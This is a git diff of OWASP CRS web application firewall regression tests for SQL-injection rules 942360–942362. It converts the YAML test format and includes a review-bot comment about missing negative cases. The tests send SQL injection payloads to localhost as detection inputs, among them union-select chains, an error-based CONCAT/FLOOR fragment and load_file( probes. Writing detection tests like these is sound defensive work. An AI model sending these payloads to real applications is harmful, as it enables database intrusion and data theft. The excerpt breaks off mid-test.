HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version)" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 38 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "(SELECT 4440 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(4440=4440,1))),0x7170716271,FLOOR" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] + - test_id: 39 desc: GH issue 1816 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" - version: HTTP/1.0 - output: - log_contains: id "942360" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "2759399466.1534185336 -6863 union all select 1,1,1,1,1,1,1,1,1,CONCAT" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml index 7c36f4b59..259cc79ba 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml 
@@ -1,126 +1,124 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942361.yaml +rule_id: 942361 tests: - - test_title: 942361-1 + - test_id: 1 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'alter a" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'alter a" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 2 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\" ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\" ALTER A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 3 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'ALTER A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'ALTER A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 4 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' alter/" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' alter/" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 5 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\" UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\" UNION A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 6 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "'UNION A" - version: HTTP/1.0 - output: - log_contains: id "942361" - - test_title: 942361-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'UNION A" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] + - test_id: 7 desc: "Detects basic SQL injection based on keyword alter or union" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' union/" - version: HTTP/1.0 - output: - log_contains: id "942361" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' union/" + version: HTTP/1.0 + output: + log: + expect_ids: [942361] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml index 97a2dc3f4..27c6d2d09 100644 
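Review bot: The migrated 942361 suite contains only positive cases — all seven stages assert `expect_ids: [942361]` — and since this hunk spans the whole 124-line file there is no stage guarding the rule against false positives, unlike the 942362 file in the same commit (tests 30 and 31 use `no_expect_ids`). Adding at least one benign-payload stage with `log: no_expect_ids: [942361]` would make an over-matching regex change visible in CI rather than only in production logs. On style, the `Accept` header value is a plain scalar in every stage here but is double-quoted in the sibling 942360 file; quoting it as `Accept: "text/xml,...;q=0.5"` keeps the two files consistent. All seven `desc` values are also the identical sentence, so they no longer tell a reader which alter/union variant each stage exercises; naming the variant per stage would help when one of them fails.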
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml 
@@ -1,552 +1,550 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" - description: None - enabled: true - name: 942362.yaml +rule_id: 942362 tests: - - test_title: 942362-1 + - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select Char(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select Char(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 3 desc: "Detects concatenated basic SQL injection 
and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHAR(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT GROUP_CONCAT(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT group_cOnCat(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 
942362-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as cc FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as cc FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS orders FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS orders FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 8 desc: "Detects concatenated basic SQL 
injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS `carrier_id` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS `carrier_id` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS Role FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - 
- test_title: 942362-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS Role FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS val FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS val FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 13 desc: 
"Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 14 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS 'Durchschnitt_Importzeit' FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS 'Durchschnitt_Importzeit' FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 15 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS 
`OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 16 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as col_0_0_ from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as col_0_0_ from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 17 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS `count` FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS `count` FROM" 
+ version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 18 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 19 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as User from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as User from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 20 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: 
POST - port: 80 - uri: "/post" - data: ") AS t FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS t FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 21 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "(load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "(load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 22 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as ExecuteTheseSQLCommands FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + 
data: ") as ExecuteTheseSQLCommands FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 23 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 24 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 25 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
